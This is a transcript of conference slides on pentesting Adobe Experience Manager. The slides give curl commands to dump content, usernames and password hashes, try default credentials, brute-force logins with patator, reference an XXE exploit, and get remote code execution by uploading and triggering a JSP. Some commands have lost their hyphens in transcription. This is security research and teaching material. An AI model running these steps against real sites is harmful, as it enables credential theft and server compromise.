hacking adobe experience manager sites
DESCRIPTION
This presentations is about pentesting AEM web applications. It have been shown on PHDays security conference.TRANSCRIPT
-
Hack1ng Adobe Experience
Manager sites
-
Mikhail Egorov
Security researcher
Works in Odin (Parallels)
0ang3el (at) gma1l (d0t) com
Who is that guy?
-
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html
Related Work
-
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification
What do we want
-
Use JsonRendererServlet
Sensitive information from JCR
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json
-
List of all bundles
QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/bin/querybuilder.json
-
List customs scripts
List compiled custom scripts from cache
Custom scripts
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json
-
Dump content node properties
Use regular expression to extract usernames (pipe with prev command)
Usernames
curl -X GET http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print "\n".join([m.group(1) for m in
re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])])' |
sort u
-
Use QueryBuilder bundle
Password hashes
curl -X GET
http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
ective&p.properties=rep:principalName%20rep:password&p.limit=100
-
Dump content node properties
Use regular expression to check (pipe with prev command)
Anonymous modification
curl -X GET http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; m =
re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print
"Anon modification: ","Yes" if m else "No"'
-
Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute hashes)
Online attack (POST servlet bundle)
Getting access
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
auth_type=basic -x ignore:code!=200 --threads 5
-
XSS
CSRF
DoS
Read local files
RCE
You have access, now what?
Not covered, sorry!
-
CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
Webdav OSGI bundle uses XML parser that is not properly initialized
Exploit - https://www.exploit-db.com/exploits/37110/
Webdav bundle, XXE
-
Out-of-bound exploitationhttp://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Pros: works with anonymous credentials
Cons: you need external server, instable
Inbound exploitation Pros: you do not need external server, more stable
Cons: you need credentials of the user that is able to modify some node in JCR
Webdav bundle, XXE
-
http://www.youtube.com/watch?v=Hg3AXoG89Gs
Webdav bundle, XXE Demo
-
We have node http://127.0.0.1:8080/rce
We have script exec.jsp that is magically loaded into node http://127.0.0.1:8080/apps/rcetype
When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
-
Step I: Create rcetype node
Remote code execution
curl u admin:admin Fjcr:primaryType=nt:folder
http://127.0.0.1:8080/content/rcetype
-
Step II: Upload script exec.jsp to rcetype node
Remote code execution
curl u admin:admin [email protected]
http://127.0.0.1:8080/content/rcetype
-
Step III: Copy rcetype to /apps
Remote code execution
curl u admin:admin F:operation=copy F:dest=/apps/rcetype
http://127.0.0.1:8080/content/rcetype
-
Step IV: Create rce node bound to rcetype
Remote code execution
curl u admin:admin Fsling:resourceType=rcetype
http://127.0.0.1:8080/content/rce
-
Step V: Launch jsp script
Remote code execution
curl X GET http://127.0.0.1:8080/content/rce.exec
-
http://www.youtube.com/watch?v=Z9n2T07e6Ls
Remote code execution, Demo
-
Ask a Ninja